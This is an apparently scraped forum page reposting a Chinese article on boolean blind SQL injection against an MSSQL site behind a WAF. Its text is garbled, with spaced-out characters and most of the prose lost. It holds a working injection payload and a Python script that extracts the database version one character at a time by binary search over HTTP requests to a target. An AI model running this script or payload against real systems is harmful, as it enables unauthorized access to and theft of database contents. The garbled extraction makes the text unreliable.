[7578] 2021-04-25_实战SQL注入-BOOL盲注-一个小细节

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-17
2021-04-25_实战SQL注入-BOOL盲注-一个小细节   |   S Q L - B O O L -   s p a c e m a n   F 1 2 s e c   2 0 2 1 - 0 4 - 2 5
  s e l e c t   b a n b a n w a f m s s q l b a n   w a i t f o r   d e l a y
b a n   p a y l o a d
a t a o p a y l o a d p l a y l o a d 1 ' ) a n d   ( a s c i i ( s u b s t r i n g ( ( { c o n t e n t } ) , { i } , 1 ) ) - { m i d } ) < 1 - - + #   - * -   c o d i n g : u t f - 8   - * - i m p o r t   r e q u e s t s u r l   =   " i p : / ? ? ? T e x t = " d e f   m a i n ( ) :         r e s u l t   =   " "         f o r   i   i n   r a n g e ( 1 ,   2 0 0 ) :                 l o w   =   3 1                 h i g h   =   1 2 8                 w h i l e   l o w   <   h i g h :                         m i d   =   i n t ( ( l o w   +   h i g h )   /   2 )                         c o n t e n t   =   " @ @ v e r s i o n "                         s q l   =   f " 1 ' ) a n d   ( a s c i i ( s u b s t r i n g ( ( { c o n t e n t } ) , { i } , 1 ) ) - { m i d } ) < 1 - - + "                         p a y l o a d   =   u r l + s q l                         r e s p o n s e   =   r e q u e s t s . g e t ( u r l = p a y l o a d )                         i f   " 1 8 "   i n   r e s p o n s e . t e x t :                                 h i g h   =   m i d                         e l s e :                                 l o w   =   m i d   +   1                         p r i n t ( " [ + ]   A f t e r   c h a n g i n g   w e   g o t   { }   t o   { } " . f o r m a t ( l o w ,   h i g h ) )                 i f   l o w   = =   h i g h   = =   1 2 8   o r   l o w   = =   h i g h   = =   3 1 :                         p r i n t ( " [ * ]   R e s u l t   i s :   { } " . f o r m a t ( r e s u l t ) )                         b r e a k                 p r i n t ( " [ + ]   N o w   h a s   { } " . f o r m a t ( i ) )                 r e s u l t   + =   c h r ( i n t ( ( h i g h   +   l o w )   /   2 ) )                 p r i n t ( " [ * ]   R e s u l t   n o w   i s :   { } " . f o r m a t ( r e s u l t ) ) i f   _ _ n a m e _ _   = =   ' _ _ m a i n _ _ ' :         m a i n ( )
      |   s q l           |   g e t s h e l l   ~
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则